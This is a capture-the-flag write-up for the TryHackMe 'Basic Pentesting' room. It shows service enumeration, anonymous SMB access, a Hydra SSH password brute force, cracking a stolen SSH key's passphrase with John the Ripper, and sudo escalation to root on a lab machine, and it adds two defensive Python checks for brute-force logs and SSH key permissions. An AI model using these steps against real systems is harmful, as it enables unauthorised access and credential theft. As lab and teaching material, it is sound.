TryHackMe – Basic Pentesting

https://tryhackme.com/room/basicpentestingjt

Note: any passwords have been redacted; only the process is shown below.

Enumeration

Port Scan (nmap)

This room has no text walkthrough and just a list of questions to answer, so it will be a good test of what we have learned so far!

First we need to do a port scan to see what ports we can uncover: nmap -sV -v 10.10.163.73.

Directory Scan (Gobuster)

We have uncovered a webserver at port 80. Now we can fire up gobuster (or dirbuster) and enumerate for any interesting directories: gobuster dir -u 10.10.163.73 -w /usr/share/wordlists/dirb/common.txt

Directory Browse

Gobuster did find one: /development. There are two files here, dev.txt:

2018-04-23: I’ve been messing with that struts stuff, and it’s pretty cool! I think it might be neat to host that on this server too. Haven’t made any real web apps yet, but I have tried that example you get to show off how it works (and it’s the REST version of the example!). Oh, and right now I’m using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

and j.txt:

For J:

I’ve been auditing the contents of /etc/shadow to make sure we don’t have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K

So now we know that there are at least two users, “J” and “K”, that J has a weak and easily crackable password, that SMB is set up, and that the server is running Apache Struts 2.5.12 (a different Apache product from the httpd 2.4.18 that nmap discovered).

We could look to see if there are any exploits for this version, and there is one: Apache Struts 2.5 < 2.5.12 RCE.

SMB Browse

We also know there is an SMB share. I ran smbclient -L 10.10.163.73 and saw there is an Anonymous share we can access with no username or password:

smbclient //10.10.163.73/Anonymous -U anonymous

We logged in successfully!

# see directory listing (l is smbclient's alias for ls)
smb: \> l
  .                                   D        0  Thu Apr 19 13:31:20 2018
  ..                                  D        0  Thu Apr 19 13:13:06 2018
  staff.txt                           N      173  Thu Apr 19 13:29:55 2018

There is an interesting file named staff.txt here! I tried to print staff.txt but we did not have permission. We will instead have to download the file to our local machine. Let’s exit smbclient. Now we know this file is right in the root of the Anonymous share, so let’s run:

smbget -U anonymous smb://10.10.163.73/Anonymous/staff.txt

And voila! We have the staff.txt file! Let’s read it:

cat staff.txt
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Alright! So now we know the two users from the /development directory are most likely Jan and Kay. We could get lucky and find they are just using these as their usernames! Let’s save them to our compendium just in case.

Password Bruteforcing (Hydra)

We can now boot up Hydra and try to brute force the password for jan, since we know it is weak and has already been cracked before:

hydra -t 5 -l jan -P /usr/share/wordlists/rockyou.txt -vV 10.10.163.73 ssh

After several minutes (fortunately the password was in the top 1000 of rockyou.txt), we got the password! Let’s add this back to our compendium and we can now SSH in!
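From the defensive side, the burst of failed logins that a Hydra run like this produces is easy to spot in sshd’s auth log. The following Python is an added example, not part of the original walkthrough: it flags any source that produces repeated failed logins inside a short window and highlights a subsequent successful login from that source (the log lines are constructed, not taken from the box).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines (not from the box): a Hydra-style burst
# from one source against jan, one unrelated failure, then a success.
SAMPLE_AUTH_LOG = """\
Apr 23 16:04:01 basic2 sshd[1201]: Failed password for jan from 10.10.14.5 port 51234 ssh2
Apr 23 16:04:01 basic2 sshd[1202]: Failed password for jan from 10.10.14.5 port 51235 ssh2
Apr 23 16:04:02 basic2 sshd[1203]: Failed password for jan from 10.10.14.5 port 51236 ssh2
Apr 23 16:04:02 basic2 sshd[1204]: Failed password for invalid user admin from 10.10.14.5 port 51237 ssh2
Apr 23 16:04:03 basic2 sshd[1205]: Failed password for jan from 10.10.14.5 port 51238 ssh2
Apr 23 16:05:10 basic2 sshd[1210]: Failed password for kay from 192.168.56.102 port 40012 ssh2
Apr 23 16:05:40 basic2 sshd[1211]: Accepted password for jan from 10.10.14.5 port 51300 ssh2
"""

FAILED_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password "
                       r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port")

def parse_ts(ts, year=2018):
    # Syslog timestamps carry no year; the caller supplies one.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed logins inside any window_seconds span.
    Returns ({ip: (total_failures, users_tried)}, [(ip, user) successes from flagged ips])."""
    failures = defaultdict(list)          # ip -> [(datetime, user), ...]
    accepted = []
    for line in log_text.splitlines():
        if m := FAILED_RE.search(line):
            failures[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
        elif m := ACCEPTED_RE.search(line):
            accepted.append((m["ip"], m["user"]))
    flagged = {}
    for ip, events in failures.items():
        events.sort()
        start = 0                         # sliding window over sorted timestamps
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = (len(events), sorted({u for _, u in events}))
                break
    # A success from a source that was just brute-forcing is the highest-priority alert.
    compromised = [(ip, user) for ip, user in accepted if ip in flagged]
    return flagged, compromised
```

On the sample, 10.10.14.5 is flagged (five failures in two seconds against jan and admin) and its later accepted login for jan is reported, while the single failure from 192.168.56.102 is ignored.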

Gain Access (SSH)

Now that we have access, let’s see what all we can do.

# first let's see where we are
jan@basic2:~$ pwd
/home/jan
# okay, good we are in jan's home folder.
# I will also cd .. and run ls -l to see who owns the folder
jan@basic2:/home$ ls -l
total 8
drwxr-xr-x 2 root root 4096 Apr 23  2018 jan
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 kay

Unfortunately, Jan does not even own her own home folder (root does), which eliminates my plan to download a LinEnum script into her home folder and run it. We will have to check some hotspots manually:

# first, let's check crontab and see if there are any user tasks
# running as root that we could exploit
jan@basic2:/home$ cat /etc/crontab
# at the very end we just see a #, which means there are no custom jobs

# now let's check important files such as /etc/passwd and /etc/shadow
# I just ls'd the directory but used grep to only grab those two
# file names
jan@basic2:/home$ ls -l /etc | grep 'passwd\|shadow'
-rw-r----- 1 root shadow   673 Apr 19  2018 gshadow
-rw------- 1 root root     665 Apr 19  2018 gshadow-
-rw-r--r-- 1 root root    1639 Apr 23  2018 passwd
-rw------- 1 root root    1602 Apr 19  2018 passwd-
-rw-r----- 1 root shadow  1085 Apr 23  2018 shadow
-rw------- 1 root root     963 Apr 19  2018 shadow-

Interestingly, everyone has read permission on /etc/passwd! We can cat /etc/passwd to see if there is anything else useful. We do at least see the user kay in the file. We can also run cat /etc/group to see what group memberships there are.

Here we can see kay is a member of several admin groups! Gaining access to her account would grant us much higher access. Let’s check out her home folder and see if there is anything there for us:

jan@basic2:~$ cd /home/kay
# now lets check for files
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo

On first thought, we see a pass.bak file. However, our user does not have read permission for it, so it is no use. The .ssh directory, on the other hand, is readable by us! Let’s cd in and see what we have:

jan@basic2:/home/kay$ cd .ssh
# look at the files
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

Well, that’s not good! For Kay, at least. We can read her id_rsa file! With this, we can copy its contents and log in as her using the ssh command. Run cat id_rsa and copy all of it to a file on your local machine named id_rsa.
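A defender’s check for exactly this finding, as an added Python example that is not part of the original walkthrough: it audits a ~/.ssh directory for private keys readable by group or other, an authorized_keys file writable by group or other, and a directory mode looser than 0700, and it builds a throwaway copy of the kay layout above (placeholder key bodies, real modes) to run against.

```python
import os
import stat
import tempfile

PRIVATE_KEY_HEADER = b"-----BEGIN"
PRIVATE_KEY_MARKER = b"PRIVATE KEY-----"

def audit_ssh_dir(ssh_dir):
    """Return [(path, finding)] for weak modes in one ~/.ssh directory, modelled on
    what the walkthrough found: world-readable id_rsa, group-writable authorized_keys,
    and a .ssh directory that is not 0700."""
    findings = []
    dir_mode = stat.S_IMODE(os.stat(ssh_dir).st_mode)
    if dir_mode & 0o077:
        findings.append((ssh_dir, f".ssh dir mode {dir_mode:04o}, expected 0700"))
    for name in sorted(os.listdir(ssh_dir)):
        path = os.path.join(ssh_dir, name)
        if not os.path.isfile(path):
            continue
        mode = stat.S_IMODE(os.stat(path).st_mode)
        with open(path, "rb") as f:
            head = f.read(64)          # PEM/OpenSSH private keys announce themselves up front
        is_private = head.startswith(PRIVATE_KEY_HEADER) and PRIVATE_KEY_MARKER in head
        if is_private and mode & 0o077:
            findings.append((path, f"private key mode {mode:04o}, accessible by group/other"))
        if name == "authorized_keys" and mode & 0o022:
            findings.append((path, f"authorized_keys mode {mode:04o}, writable by group/other"))
    return findings

def build_sample_home():
    """Construct a throwaway dir reproducing the modes seen under /home/kay/.ssh
    (key bodies are placeholders, not real keys); returns the .ssh path."""
    home = tempfile.mkdtemp(prefix="kayhome_")
    ssh = os.path.join(home, ".ssh")
    os.mkdir(ssh)
    os.chmod(ssh, 0o755)                  # drwxr-xr-x, as on the box
    files = {
        "id_rsa": (0o644, b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n"),
        "id_rsa.pub": (0o644, b"ssh-rsa PLACEHOLDER kay@basic2\n"),
        "authorized_keys": (0o664, b"ssh-rsa PLACEHOLDER kay@basic2\n"),
        "id_ed25519": (0o600, b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n"),
    }
    for name, (mode, body) in files.items():
        path = os.path.join(ssh, name)
        with open(path, "wb") as f:
            f.write(body)
        os.chmod(path, mode)
    return ssh
```

Running audit_ssh_dir(build_sample_home()) reports the 0755 directory, the 0664 authorized_keys and the 0644 id_rsa, and stays silent on the public key and the correctly locked-down 0600 id_ed25519.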

Now we can exit our SSH session as jan and be back in our own terminal. One other issue with this id_rsa file is that it’s encrypted with AES-128-CBC, so even if we try to use it, it will ask for a passphrase that we do not yet know. We can use a script called ssh2john to convert the key into a hash format that John the Ripper can attack and try to crack the passphrase:

# on kali it is installed already in the listed directory
# otherwise you can wget the script from above and run it that way
# this will output the file into a format john the ripper can decode
┌──(kali㉿kali)-[~/thm]
└─$ python /usr/share/john/ssh2john.py /home/kali/thm/id_rsa > crack.txt

# now we can run john the ripper on it for the passphrase
┌──(kali㉿kali)-[~/thm]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
-redacted-          (/home/kali/thm/id_rsa)

Great, now we know the passphrase for the id_rsa key! Let’s use this to login.

┌──(kali㉿kali)-[~/thm]
└─$ ssh -i "/home/kali/thm/id_rsa" kay@10.10.163.73
Enter passphrase for key '/home/kali/thm/id_rsa': 

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

We’re in!

Now, if we remember from before, there was an interesting file in kay’s home directory named pass.bak. We are already in her home directory, so let’s just cat pass.bak. And now we have her actual password!

We can run sudo -l and enter her super long password, and we see that this user can run all commands with sudo!

kay@basic2:~$ sudo -l
[sudo] password for kay: 
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL

So let’s elevate even higher and run sudo /bin/bash. Now we have a terminal as root!

kay@basic2:~$ sudo /bin/bash
root@basic2:~# whoami
root

For our final step, let’s cd into root’s home directory (cd /root) and grab that flag: cat flag.txt

Machine Compendium

All the information about our target machine; I continually update this as we discover more info!

{
	"MACHINE_IP": "10.10.163.73",
	"MACHINE_INFO": {
		"os": "Ubuntu Linux",
		"commonName": ""
	},
	"OPEN_PORTS": {
		"22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4"],
		"80": ["http", "Apache httpd 2.4.18"],
		"139": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
		"445": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
		"8009": "ajp13?",
		"8080": "http-proxy"
	},
	"CREDENTIALS": {
	},
	"OTHER_INFO": {
		"vulnerabilities": ["CVE 2017-9805 - Apache RCE"],
		"notable_web_dir": ["/development"]
	}
}
